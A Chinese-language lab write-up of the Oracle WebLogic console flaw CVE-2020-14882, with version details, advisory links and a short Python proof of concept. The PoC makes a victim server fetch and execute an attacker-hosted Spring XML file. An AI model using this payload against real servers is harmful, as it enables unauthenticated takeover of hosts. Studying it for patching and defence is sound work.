CVE-2020-14882 是 Oracle WebLogic Server 控制台组件中的一个远程代码执行 (RCE) 漏洞。该未授权漏洞的攻击复杂度被评定为“低”,并被 Oracle 标为“易于利用”,从而获得了 9.8 分的严重 CVSSv3 评分。成功利用后,未经身份验证的攻击者能够通过 HTTP 入侵 Oracle WebLogic 服务器,并完全控制主机。(了解更多 - Tenable)
受影响的支持版本为 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 和 14.1.1.0.0。
受害者(WebLogic 服务器):192.168.0.15 - 运行 WebLogic 服务器的 Windows 10 PRO。
攻击者(托管 XML 文件):192.168.0.16 - Kali Linux - GNU/Linux - Debian。
Payload:
import requests
url = http://{}:{}/console/images/%252E%252E%252Fconsole.portal' \
'?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext' \
'(%22http://192.168.0.16:8000/Documents/teste.xml%22)'.format('192.168.0.15', '7001')
response = requests.get(url)
该 payload 会调用 Spring 框架的 XML 库,向攻击者域中的服务器发送请求,寻找 teste.xml 文件。
value 字段非常重要,因为它们将在受害者端被执行。在本例中,我们调用了 Windows 计算器程序。
10 月 28 日,一位名为 Jang 的安全研究员发布了一篇博客文章(越南语),内容涉及 CVE-2020-14882,其中包括可用于 PoC 的部分细节。Jang 对 WebLogic 漏洞并不陌生,曾于 2020 年 1 月发现并向 Oracle 报告了 CVE-2020-2555,该漏洞已在 Oracle 的 CPU 更新中修复。3 月,Jang 确认 CVE-2020-2555 并未完全修复。对于 CVE-2020-2555 的绕过方法由另一位研究员 Quynh Le(VNPT 信息安全中心)披露。Le 和 Jang 均因报告此绕过方法而获得致谢,该绕过方法被标识为 CVE-2020-2883。(了解更多 - Tenable)
Oracle WebLogic: CVE-2020-14882 : Critical Patch Update(文档 ID 2771503.1)。(Oracle 支持)
Oracle Critical Patch Update Advisory - 2020 年 10 月。(Oracle 支持)
如何缓解 CVE-2020-14882 Weblogic 的影响。(Oracle 支持)
Oracle Fusion Middleware 的 Oracle WebLogic Server 产品中的漏洞。(Mitre - CVE)